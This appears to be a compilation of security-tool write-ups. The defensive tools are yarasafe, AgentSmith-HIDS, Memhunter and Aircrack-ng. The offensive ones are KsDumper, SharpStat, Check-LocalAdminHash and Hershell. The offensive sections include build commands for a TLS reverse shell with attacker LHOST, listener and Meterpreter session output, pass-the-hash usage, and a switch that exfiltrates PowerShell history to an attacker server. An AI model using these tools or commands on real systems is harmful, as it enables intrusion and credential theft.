Using yarasafe you can easily create signatures for binary functions without looking at the assembly code at all! You just need to install the IDA Pro plugin that you can find in the IDA Pro plugin folder of this repository.
Once you have installed the plugin you can start creating embeddings for the functions you want to match. These embeddings can be inserted into yara rules to match functions using yara. To create powerful rules, you can combine multiple function embeddings with standard yara rules.
In this repository you will find the plugin for IDA Pro, and the yarasafe module.
Yarasafe can match functions with more than 50 and fewer than 150 instructions.

Requirements
  • python3
  • radare2
  • jansson

Quickstart
First of all, install the IDA Pro plugin. You can find the instructions for doing it in the ida-pro-plugin folder of this repository. Then you can use our docker container or you can build yara with the yarasafe module.

Docker
The fastest way to use yarasafe is to use our docker container.
Pull the image:
  • docker pull massarelli/yarasafe
Start the docker mounting the folder that contains the rule and the file to analyze:
  • docker run -v {FOLDER_TO_MOUNT}:/home/yarasafe/test -it massarelli/yarasafe bash
Launch yara inside the docker with your rule!

Ubuntu
  • Clone the repository:
git clone https://github.com/lucamassarelli/yarasafe.git
  • Install yara dependencies:
sudo apt-get install automake libtool make gcc flex bison 
sudo apt-get install libjansson-dev
  • Install radare2 on your system:
git clone https://github.com/radare/radare2.git
cd radare2
./sys/install.sh
  • Install yarasafe dependencies:
cd yarasafe/python_script
pip3 install -r requirements.txt
  • Compile:
./bootstrap.sh
./configure
make
  • Export environment variable:
export YARAPYSCRIPT={PATH_TO_YARASAFE_REPO}/python_script

MacOS
  • Clone the repository:
git clone https://github.com/lucamassarelli/yarasafe.git
  • Install yara dependencies:
brew install automake libtool flex bison 
brew install jansson
  • Install radare2 on your system:
git clone https://github.com/radare/radare2.git
cd radare2
./sys/install.sh
Install yarasafe dependencies:
cd yarasafe/python_script
pip3 install -r requirements.txt
  • Compile:
./bootstrap.sh
./configure.sh
make
  • Export environment variable:
export YARAPYSCRIPT={PATH_TO_YARASAFE_REPO}/python_script

Testing
Inside the folder rules you can find the rule sample_safe_rule.yar. This rule should trigger with any PE file:
yara {PATH_TO_YARASAFE_REPO}/rules/sample_safe_rule.yar {FILES}

How to write your rule
To create your safe-yara-rule, you first need to create the embeddings for your function. In order to accomplish this, you can use the IDA Pro plugin shipped within this repository. Inside the folder ida-pro-plugin you can find all the information on how to run the plugin!
Once you get the embeddings for your functions, you just need to create the rule. An example of safe-yara-rule is:
import "safe"

rule example
{
meta:
description = "This is just an example"
threat_level = 3
in_the_wild = true

condition:
safe.similarity("[-0.02724416,0.00640265,0.01138294,-0.07013566,0.00306808,-0.09757628,0.10414989,-0.13555837,-0.07873314,-0.00725415,-0.01418876,-0.05907412,-0.12452127,0.06237456,0.02260636,-0.06013175,0.11689295,-0.00200026,-0.03594812,0.07857288,-0.00288544,0.01148411,0.00891006,0.04702956,0.1205316,0.0079077,-0.07449158,0.00653283,0.15414064,0.13021031,0.01325423,-0.35491243,-0.00992016,-0.21460094,0.0558461,-0.07761839,-0.10909985,-0.05616508,0.01800609,0.06736821,0.00308393,0.04241242,-0.08351246,0.13501632,-0.10729794,-0.10229874,0.00066896,-0.01963937,0.05516102,-0.01612499,-0.09743191,-0.0314435,-0.01470971,-0.00125769,-0.01774654,0.2332938,0.14166495,0.16998142,-0.04843156,-0.08931472,0.13102795,0.14147657,0.02275739,-0.04335862,0.05724025,0.03936686,-0.105 26938,-0.11637416,-0.0112917,0.05484914,-0.06934103,0.2543144,-0.17833991,-0.00828893,0.00174531,-0.03048271,-0.04773486,0.095866,-0.14434388,0.11433239,-0.10749247,0.03952292,0.03988512,-0.11541581,-0.07812429,-0.04978319,0.32052052,-0.0497911,-0.13022986,0.02477266,-0.05968329,0.01724695,0.01577485,-0.0497415,0.24494685,0.00361651,-0.08172874,-0.07473877,-0.01046288,0.02298573]") > 0.95
}
The rule will be satisfied if inside the sample there is at least one function whose similarity with the target is more than 0.95.
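Conceptually, the comparison is a similarity score between two embedding vectors; the cosine-similarity sketch below is assumed to match the SAFE paper's notion of similarity (see the paper and the module source for the exact definition):
import numpy as np

def cosine_similarity(a, b) -> float:
    a, b = np.asarray(a, dtype=float), np.asarray(b, dtype=float)
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

rule_embedding = [-0.027, 0.006, 0.011]      # truncated example vector from a rule
sample_embedding = [-0.025, 0.007, 0.010]    # embedding of a function found in the sample
print(cosine_similarity(rule_embedding, sample_embedding) > 0.95)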

Adding safe to your version of yara
If you want to add safe to your yara repository:
  • Install all dependencies
  • Copy the file libyara/modules/safe.c into your_rep/libyara/modules/safe.c
  • Copy the folder libyara/include/python into your_rep/libyara/include
  • At the end of libyara/modules/module_list add: MODULE(safe)
  • Modify libyara/Makefile.am:
    • after the line:
    libyara_la_LDFLAGS = -version-number 3:8:1
    • add:
    libyara_la_LDFLAGS += -LPATH_TO_PYTHON3.*_LIB -lpython3.*m -ljansson 
  • Compile!


KsDumper - Dumping Processes Using The Power Of Kernel Space


I always had an interest in reverse engineering. A few days ago I wanted to look at some game internals for fun, but it was packed & protected by EAC (EasyAntiCheat). This means its handles were stripped and I was unable to dump the process from Ring3. I decided to try to make a custom driver that would allow me to copy the process memory without using OpenProcess. I knew nothing about the Windows kernel or the PE file structure, so I spent a lot of time reading articles and forums to make this project.

Features
  • Dump any process main module using a kernel driver (both x86 and x64)
  • Rebuild PE32/PE64 header and sections
  • Works on protected system processes & processes with stripped handles (anti-cheats)
Note: Import table isn't rebuilt.

Usage
Before using KsDumperClient, the KsDumper driver needs to be loaded.
It is unsigned so you need to load it however you want. I'm using drvmap for Win10. Everything is provided in this release if you want to use it as well.
  • Run Driver/LoadCapcom.bat as Admin. Don't press any key or close the window yet !
  • Run Driver/LoadUnsignedDriver.bat as Admin.
  • Press enter in the LoadCapcom cmd to unload the driver.
  • Run KsDumperClient.exe.
  • Profit !
Note: The driver stays loaded until you reboot, so if you close KsDumperClient.exe, you can just reopen it !
Note2: Even though it can dump both x86 & x64 processes, this has to run on x64 Windows.

References

Compile Yourself
  • Requires Visual Studio 2017
  • Requires Windows Driver Kit (WDK)
  • Requires .NET 4.6.1


SharpStat - C# Utility That Uses WMI To Run "cmd.exe /c netstat -n", Save The Output To A File, Then Use SMB To Read And Delete The File Remotely


C# utility that uses WMI to run "cmd.exe /c netstat -n", save the output to a file, then use SMB to read and delete the file remotely

Description
This script will attempt to connect to all the supplied computers and use WMI to execute cmd.exe /c netstat -n > <file>. The file the output is saved to is specified by '-file'. Once the netstat command has run, the output is read via a remote SMB call and the file is deleted.
While this isn't the stealthiest of scripts (because of the cmd.exe execution and saving to a file), sometimes you gotta do what you gotta do. An alternative would be to use WMI to remotely query netstat information, but that WMI class is only available on Win10+ systems, which isn't ideal. This solution at least works for all levels of operating systems.

Usage
 Mandatory Options:
-file = This is the file that the output will be saved in
temporarily before being remotely read/deleted

Optional Options:
-computers = A list of systems to run this against, separated by commas
[or]
-dc = A domain controller to get a list of domain computers from
-domain = The domain to get a list of domain computers from

Examples
     SharpStat.exe -file "C:\Users\Public\test.txt" -domain lab.raikia.com -dc lab.raikia.com
SharpStat.exe -file "C:\Users\Public\test.txt" -computers "wkstn7.lab.raikia.com,wkstn10.lab.raikia.com"

Contact
If you have questions or issues, hit me up at raikiasec@gmail.com or @raikiasec


Check-LocalAdminHash - A PowerShell Tool That Attempts To Authenticate To Multiple Hosts Over Either WMI Or SMB Using A Password Hash To Determine If The Provided Credential Is A Local Administrator

Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code. It utilizes Kevin Robertson's (@kevin_robertson) Invoke-TheHash project for the credential checking portion. Additionally, the script utilizes modules from PowerView by Will Schroeder (@harmj0y) and Matt Graeber (@mattifestation) to enumerate domain computers to find targets for testing admin access against.


The reason this script even exists is because on an assessment I wanted to gather all the PowerShell console history files (PSReadline) from every system on the network. The PSReadline console history is essentially the PowerShell version of bash history. It can include so many interesting things that people type into their terminals including passwords. So, included in this script is an option to exfiltrate all the PSReadline files as well. There is a bit of setup for this. See the end of the Readme for setup.

For more info read the blog here: https://www.blackhillsinfosec.com/check-localadminhash-exfiltrating-all-powershell-history/

Examples

Checking Local Admin Hash Against All Hosts Over WMI
This command will use the domain 'testdomain.local' to lookup all systems and then attempt to authenticate to each one using the user 'testdomain.local\PossibleAdminUser' and a password hash over WMI.
Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems

Exfiltrate All PSReadline Console History Files
This command will use the domain 'testdomain.local' to lookup all systems and then attempt to authenticate to each one using the user 'testdomain.local\PossibleAdminUser' and a password hash over WMI. It then attempts to locate PowerShell console history files (PSReadline) for each profile on every system and then POST's them to a web server. See the bottom of the Readme for server setup.
Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems -ExfilPSReadline

Using A CIDR Range
This command will use the provided CIDR range to generate a target list and then attempt to authenticate to each one using the local user 'PossibleAdminUser' and a password hash over WMI.
Check-LocalAdminHash -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -CIDR 192.168.1.0/24

Using Target List and SMB and Output to File
This command will use the provided targetlist and attempt to authenticate to each host using the local user 'PossibleAdminUser' and a password hash over SMB.
Check-LocalAdminHash -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -TargetList C:\temp\targetlist.txt -Protocol SMB | Out-File -Encoding Ascii C:\temp\local-admin-systems.txt

Single Target
This command attempts to perform a local authentication for the user Administrator against the system 192.168.0.16 over SMB.
Check-LocalAdminHash -TargetSystem 192.168.0.16 -Username Administrator -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -Protocol SMB

Check-LocalAdminHash Options
Username - The Username for attempting authentication.
PasswordHash - Password hash of the user.
TargetSystem - Single hostname or IP for authentication attempt.
TargetList - A list of hosts to scan one per line
AllSystems - A switch that when enabled utilizes PowerView modules to enumerate all domain systems. This list is then used to check local admin access.
Domain - This is the domain that PowerView will utilize for discovering systems.
UserDomain - This is the user's domain to authenticate to each system with. Don't use this flag if using a local cred instead of domain cred.
Protocol - This is the setting for whether to check the hash using WMI or SMB. Default is 'WMI' but set it to 'SMB' to check that instead.
CIDR - Specify a CIDR form network range such as 192.168.0.0/24
Threads - Defaults to 5 threads. (I've run into some odd issues setting threads more than 15 with some results not coming back.)
ExfilPSReadline - For each system where auth is successful it runs a PowerShell command to locate PSReadLine console history files (PowerShell command history) and then POSTs them to a web server. See the Readme for server setup.

PSReadline Exfiltration Setup
This is your warning that you are about to setup an Internet-facing server that will accept file uploads. Typically, this is a very bad thing to do. So definitely take precautions when doing this. I would recommend locking down firewall rules so that only the IP that will be uploading PSReadline files can hit the web server. Also, while we are on the topic of security, this will work just fine with an HTTPS connection so setup your domain and cert so that the PSReadline files are sent encrypted over the network. You have been warned...
  • Setup a server wherever you would like the files to be sent. This server must be reachable over HTTP/HTTPS from each system.
  • Copy the index.php script from this repo and put it in /index.php in the web root (/var/www/html) on your web server.
  • Make an uploads directory
mkdir /var/www/html/uploads
  • Modify the permissions of this directory
chmod 0777 /var/www/html/uploads
  • Make sure php is installed
apt-get install php
  • Restart Apache
service apache2 restart
  • In the Check-LocalAdminHash.ps1 script itself scroll down to the "Gen-EncodedUploadScript" function and modify the "$Url" variable right under "$UnencodedCommand". Point it at your web server index.php page. I haven't figured out how to pass the UploadUrl variable into that section of the code that ends up getting encoded and run on target systems so hardcode it for now.
Now when you run Check-LocalAdminHash with the -ExfilPSReadline flag it should attempt to POST each PSReadline (if there are any) to your webserver.


Credits
Check-LocalAdminHash is pretty much a Frankenstein of two of my favorite tools, PowerView and Invoke-TheHash. 95% of the code is from those two tools. So the credit goes to Kevin Robertson (@kevin_robertson) for Invoke-TheHash, and credit goes to Will Schroeder (@harmj0y), Matt Graeber (@mattifestation) (and anyone else who worked on PowerView). Without those two tools this script wouldn't exist. Also shoutout to Steve Borosh (@424f424f) for help with the threading and just being an all around awesome dude.
Invoke-TheHash - https://github.com/Kevin-Robertson/Invoke-TheHash
PowerView - https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1


Hershell - Multiplatform Reverse Shell Generator


Simple TCP reverse shell written in Go.
It uses TLS to secure the communications, and provides a certificate public key fingerprint pinning feature, preventing traffic interception.
Supported OS are:
  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives
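To illustrate the pinning idea mentioned above in Python (Hershell's own implementation is in Go and pins the public key fingerprint; this simplified sketch hashes the whole certificate instead):
import hashlib
import ssl

EXPECTED_SHA256 = "..."   # fingerprint baked in at build time (placeholder)

def server_matches_pin(host: str, port: int) -> bool:
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest() == EXPECTED_SHA256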

Why ?
Although meterpreter payloads are great, they are sometimes spotted by AV products.
The goal of this project is to get a simple reverse shell, which can work on multiple systems.

How ?
Since it's written in Go, you can cross compile the source for the desired architecture.

Getting started & dependencies
As this is a Go project, you will need to follow the official documentation to set up your Golang environment (with the $GOPATH environment variable).
Then, just run go get github.com/lesnuages/hershell to fetch the project.

Building the payload
To simplify things, you can use the provided Makefile. You can set the following environment variables:
  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port
For the GOOS and GOARCH variables, you can get the allowed values here.
However, some helper targets are available in the Makefile:
  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos32 : builds a mac os 32 bits executable (Mach-O)
  • macos64 : builds a mac os 64 bits executable (Mach-O)
For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell
Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.
The following special commands are supported:
  • run_shell : drops you a system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it
  • meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

Usage
First of all, you will need to generate a valid certificate:
$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
For windows:
# Predefined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234
For Linux:
# Predefined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234
For Mac OS X
$ make macos LHOST=192.168.0.12 LPORT=1234

Examples

Basic usage
One can use various tools to handle incoming connections, such as:
  • socat
  • ncat
  • openssl server module
  • metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)
Here is an example with ncat:
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab

Meterpreter staging
WARNING: this currently only works for the Windows platform.
The meterpreter staging currently supports the following payloads:
  • windows/meterpreter/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_http
  • windows/x64/meterpreter/reverse_http
  • windows/meterpreter/reverse_https
  • windows/x64/meterpreter/reverse_https
To use the correct one, just specify the transport you want to use (tcp, http, https)
To use the meterpreter staging feature, just start your handler:
[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
Then, in hershell, use the meterpreter command:
[hershell]> meterpreter https 172.16.122.105:8443
A new meterpreter session should pop in msfconsole:
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100

[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab

Credits
@khast3x for the Dockerfile feature


AgentSmith-HIDS - Open Source Host-based Intrusion Detection System (HIDS)


Technically, AgentSmith-HIDS is not a Host-based Intrusion Detection System (HIDS), due to its lack of a rule engine and detection functions. However, it can be used as a high-performance 'Host Information Collection Agent' as part of your own HIDS solution. The comprehensiveness of the information this agent can collect was one of the most important metrics during development, hence it was built to function in the kernel stack, gaining huge advantages over agents that work in user space, such as:
  • Better performance: the information needed is collected in the kernel stack, avoiding supplementary actions such as traversing '/proc'; and to enhance the performance of data transportation, collected data is transferred via shared RAM instead of netlink.
  • Hard to bypass: information collection is powered by a specifically designed kernel driver, making it almost impossible for malicious software like rootkits, which deliberately hide themselves, to bypass detection.
  • Easy to integrate: AgentSmith-HIDS was built to integrate with other applications and can be used not only as a security tool but also as a good monitoring tool, or even a good detector of your assets. The agent is capable of collecting the users, files, processes and internet connections for you, so imagine what you could get by integrating it with a CMDB: a comprehensive map of your network, hosts, containers and business (even dependencies). What if you also have a database audit tool at hand? The map can be extended to contain the relationships between your DBs, DB users, tables, fields, applications, network, hosts, containers, etc. Considering the possibility of integration with a network intrusion detection system and/or threat intelligence, higher traceability could also be achieved. It just never gets old.
  • Kernel stack + user stack: AgentSmith-HIDS also provides a user-stack module to further extend the functionality when working with the kernel-stack module.

Major abilities of AgentSmith-HIDS:
  • The kernel-stack module hooks execve, connect, process-inject, create-file, DNS-query and load-LKM behaviors via Kprobe, and is also capable of monitoring containers by being compatible with Linux namespaces.
  • The user-stack module utilizes built-in detection functions, including queries of the user list, listening ports list, system RPM list and scheduled jobs.
  • Anti-rootkit, from Tyton; for now it adds the PROC_FILE_HOOK, SYSCALL_HOOK, LKM_HIDDEN and INTERRUPTS_HOOK features, but only works on kernel > 3.10.
  • Cred-change monitoring (except for sudo/su/sshd)

About the compatibility with Kernel version
  • Kernel > 2.6.25
  • AntiRootKit > 3.10

About the compatibility with Containers
Source    Nodename
Host      hostname
Docker    container name
k8s       pod name

Composition of AgentSmith-HIDS
  • Kernel-stack module (LKM): hooks key functions via Kprobe to capture the information needed.
  • User-stack module: collects the data captured by the kernel-stack module, performs the necessary processing and sends it to Kafka; keeps sending heartbeat packets to the server so process integrity can be verified; executes commands received from the server.
  • Agent server (optional): sends commands to the user-stack module and monitors its status.
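Since the user-stack module ships its events to Kafka as JSON, a downstream consumer can be as simple as the following sketch (the topic name and broker address are assumptions; the data_type values come from the examples below):
import json
from kafka import KafkaConsumer   # pip install kafka-python

consumer = KafkaConsumer(
    "agentsmith-hids",                         # assumed topic name
    bootstrap_servers="localhost:9092",
    value_deserializer=lambda raw: json.loads(raw.decode()),
)

for msg in consumer:
    event = msg.value
    if event.get("data_type") == "59":         # execve event (see the example below)
        print(event["exe"], event["argv"], event["exe_md5"])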

Execve Hook
Achieved by hooking sys_execve()/sys_execveat(), example:
{
"uid":"0",
"data_type":"59",
"run_path":"/root/AgentSmith-HIDS/agent/target/release",
"exe":"/usr/bin/ls",
"argv":"ls --color=auto --indicator-style=classify ",
"pid":"6265",
"ppid":"1941",
"pgid":"6265",
"tgid":"6265",
"comm":"fish",
"nodename":"test",
"stdin":"/dev/pts/0",
"stdout":"/dev/pts/0",
"sessionid":"1",
"user":"root",
"time":"1575721900051",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"a0c32dd6d3bc4d364380e2e65fe9ac64"
}

Connect Hook
Achieved by hooking sys_connect(), example:
{
"uid":"0",
"data_type":"42",
"sa_family":"4",
"fd":"4",
"dport":"1025",
"dip":"180.101.49.11",
"exe":"/usr/bin/ping",
"pid":"6294",
"ppid":"1941",
"pgid":"6294",
"tgid":"6294",
"comm":"ping",
"nodename":"test",
"sip":"192.168.165.153",
"sport":"45524",
"res":"0",
"sessionid":"1",
"user":"root",
"time":"1575721921240",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"735ae70b4ceb8707acc40bc5a3d06e04"
}

DNS Query Hook
Achieved by hooking sys_recvfrom(), example:
{
"uid":"0",
"data_type":"601",
"sa_family":"4",
"fd":"4",
"sport":"53",
"sip":"192.168.165.2",
"exe":"/usr/bin/ping",
"pid":"6294",
"ppid":"1941",
"pgid":"6294",
"tgid":"6294",
"comm":"ping",
"nodename":"test",
"dip":"192.168.165.153",
"dport":"53178",
"qr":"1",
"opcode":"0",
"rcode":"0",
"query":"www.baidu.com",
"sessionid":"1",
"user":"root",
"time":"1575721921240",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"39c45487a85e26ce5755a893f7e88293"
}

Create File Hook
Achieved by hooking security_inode_create(), example:
{
"uid":"0",
"data_type":"602",
"exe":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.232.b09-0.el7_7.x86_64/jre/bin/java",
"file_path":"/tmp/kafka-logs/replication-offset-checkpoint.tmp",
"pid":"3341",
"ppid":"1",
"pgid":"2657",
"tgid":"2659",
"comm":"kafka-scheduler",
"nodename":"test",
"sessionid":"3",
"user":"root",
"time":"1575721984257",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"215be70a38c3a2e14e09d637c85d5311",
"create_file_md5":"d41d8cd98f00b204e9800998ecf8427e"
}

Process Inject Hook
Achieved by hooking sys_ptrace(), example:
{
"uid":"0",
"data_type":"101",
"ptrace_request":"4",
"target_pid":"7402",
"addr":"00007ffe13011ee6",
"data":"-a",
"exe":"/root/ptrace/ptrace",
"pid":"7401",
"ppid":"1941",
"pgid":"7401",
"tgid":"7401",
"comm":"ptrace",
"nodename":"test",
"sessionid":"1",
"user":"root",
"time":"1575722717065",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"863293f9fcf1af7afe5797a4b6b7aa0a"
}

Load LKM File Hook
Achieved by hooking load_module(), example:
{
"uid":"0",
"data_type":"603",
"exe":"/usr/bin/kmod",
"lkm_file":"/root/ptrace/ptrace",
"pid":"29461",
"ppid":"9766",
"pgid":"29461",
"tgid":"29461",
"comm":"insmod",
"nodename":"test",
"sessionid":"13",
"user":"root",
"time":"1577212873791",
"local_ip":"192.168.165.152",
"hostname":"test",
"exe_md5":"0010433ab9105d666b044779f36d6d1e",
"load_file_md5":"863293f9fcf1af7afe5797a4b6b7aa0a"
}

Cred Change Hook
Achieved by hooking commit_creds(), example:
{
"uid":"0",
"data_type":"604",
"exe":"/tmp/tt",
"pid":"27737",
"ppid":"26865",
"pgid":"27737",
"tgid":"27737",
"comm":"tt",
"old_uid":"1000",
"nodename":"test",
"sessionid":"42",
"user":"root",
"time":"1578396197131",
"local_ip":"192.168.165.152",
"hostname":"test",
"exe_md5":"d99a695d2dc4b5099383f30964689c55"
}

PROC File Hook Alert
{
"uid":"-1",
"data_type":"700",
"module_name":"autoipv6",
"hidden":"0",
"time":"1578384987766",
"local_ip":"192.168.165.152",
"hostname":"test"
}

Syscall Hook Alert
{
"uid":"-1",
"data_type":"701",
"module_name":"diamorphine",
"hidden":"1",
"syscall_number":"78",
"time":"1578384927606",
"local_ip":"192.168.165.152",
"hostname":"test"
}

LKM Hidden Alert
{
"uid":"-1",
"data_type":"702",
"module_name":"diamorphine",
"hidden":"1",
"time":"1578384927606",
"local_ip":"192.168.165.152",
"hostname":"test"
}

Interrupts Hook Alert
{
"uid":"-1",
"data_type":"703",
"module_name":"syshook",
"hidden":"1",
"interrupt_number":"2",
"time":"1578384927606",
"local_ip":"192.168.165.152",
"hostname":"test"
}

About Performance of AgentSmith-HIDS
Testing Environment:
  • CPU: Intel(R) Core(TM) i7-4870HQ @ 2.50GHz, 2 cores
  • RAM: 2GB
  • OS/Kernel: CentOS 7 / 3.10.0-1062.7.1.el7.x86_64
Testing Result:
Average delay per hook handler (us):
  • execve_entry_handler: 10.4
  • connect_handler: 7.5
  • connect_entry_handler: 0.06
  • recvfrom_handler: 9.2
  • recvfrom_entry_handler: 0.17
  • fsnotify_post_handler: 0.07
Original Testing Data:
Benchmark Data

Documents for deployment and testing purposes:
Quick Start

Special Thanks (in no particular order)
yuzunzhi
hapood
HF-Daniel

Memhunter - Live Hunting Of Code Injection Techniques


Memhunter is an endpoint sensor tool specialized in detecting resident malware, improving the threat hunter analysis process and remediation times. The tool detects and reports memory-resident malware living in endpoint processes, covering known malicious memory injection techniques. The detection process is performed through live analysis, without needing memory dumps. The tool was designed as a replacement for memory forensics volatility plugins such as malfind and hollowfind. Not requiring memory dumps makes it possible to hunt memory-resident malware at scale, without manual analysis and without the complex infrastructure needed to move dumps to forensic environments.

The detection process is performed through a combination of endpoint data collection and memory inspection scanners. The tool is a standalone binary that, upon execution, deploys itself as a Windows service. Once running as a service, memhunter starts collecting ETW events that might indicate code injection attacks. The live stream of collected events is fed into memory inspection scanners that use detection heuristics to down-select the potential attacks. The entire detection process requires neither human intervention nor memory dumps, and it can be performed by the tool itself at scale.

Besides the data collection and hunting heuristics, the project has also led to the creation of a companion tool called "minjector" that contains more than 15 code injection techniques. The minjector tool can not only be used to exercise memhunter detections, but also serves as a one-stop location to learn about well-known code injection techniques.
Architecture deck available here

Example 1: Manual run to exercise detection of reflective DLL injection



Example 2: Manual run to exercise detection of process hollowing injection




Aircrack-ng 1.6 - Complete Suite Of Tools To Assess WiFi Network Security


Aircrack-ng is a complete suite of tools to assess WiFi network security.
It focuses on different areas of WiFi security:
  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).
All tools are command line, which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily on Linux but also on Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

It's been more than a year since the last release, and this one brings a ton of improvements.

The most noticeable change is the rate display in Airodump-ng. Previously, it went up to 54 Mbit. Now it takes into account the complexity of 802.11n/ac and calculates the maximum rate that can be achieved on the AP. Expect 802.11ax rates in the next release. We brought basic UTF-8 support for ESSIDs, and if you ever come across WPA3 or OWE, these will be displayed correctly as well. Airodump-ng has had the ability to read PCAP files for quite some time, which can be handy to generate one of the CSV/netxml or other output formats available. However, signal levels were not displayed; this has now been fixed. A new option has been added to read the files in realtime, instead of reading them all at once.

Huge improvements have been made under the hood as well. Code has been cleaned up, deduplicated (Pull Request 2010), and reorganized (Pull Request 2032), which led to a lot of fixes.

This reorganization also updated the build system, which now requires automake 1.14+. This was a problem on CentOS 7, but we provide a script to install these requirements from source; although automake 1.14 (and the other dependencies) were released more than six years ago, CentOS is the only distribution that doesn't ship them, and providing an install script was considered a small price to pay to improve and simplify the build system.

Other tools received fixes as well:
  • Along with a few fixes, Airmon-ng now handles more network managers, and persistent ones; no need to run airmon-ng check kill a few times for the network managers that keep restarting.
  • Airdecap-ng can now decrypt both sides of the conversation when WDS is in use.
  • As usual, we updated WPE patches for freeradius and HostAPd.
  • Python 2 is dead as of January 1st, and now all our scripts support Python 3. If you are still running Python 2, don't worry, they are still backward compatible.
  • Aircrack-ng contains fixes for a few crashes and other regressions, as well as improved CPU detection in some cases (-u option).

We have been working on our infrastructure and have a buildbot server with quite a few systems. If you head over to our buildbot landing page, you can see the extent of the build system: 14 systems to test builds on, in addition to AppVeyor, TravisCI, and Coverity Scan, plus one to automatically package it and upload packages to packagecloud.io. It gets triggered every time we push code to our GitHub repository, and you can see the details of each build for each commit on GitHub. We have an earlier blog post where you can find some details of our CI/CD.
We are currently working on bringing Mac infrastructure as well.

We keep working on our automated tests, and a few have been added; this release also brings integration tests (16 for now) to automatically test different features of airodump-ng, aireplay-ng, airbase-ng and others.

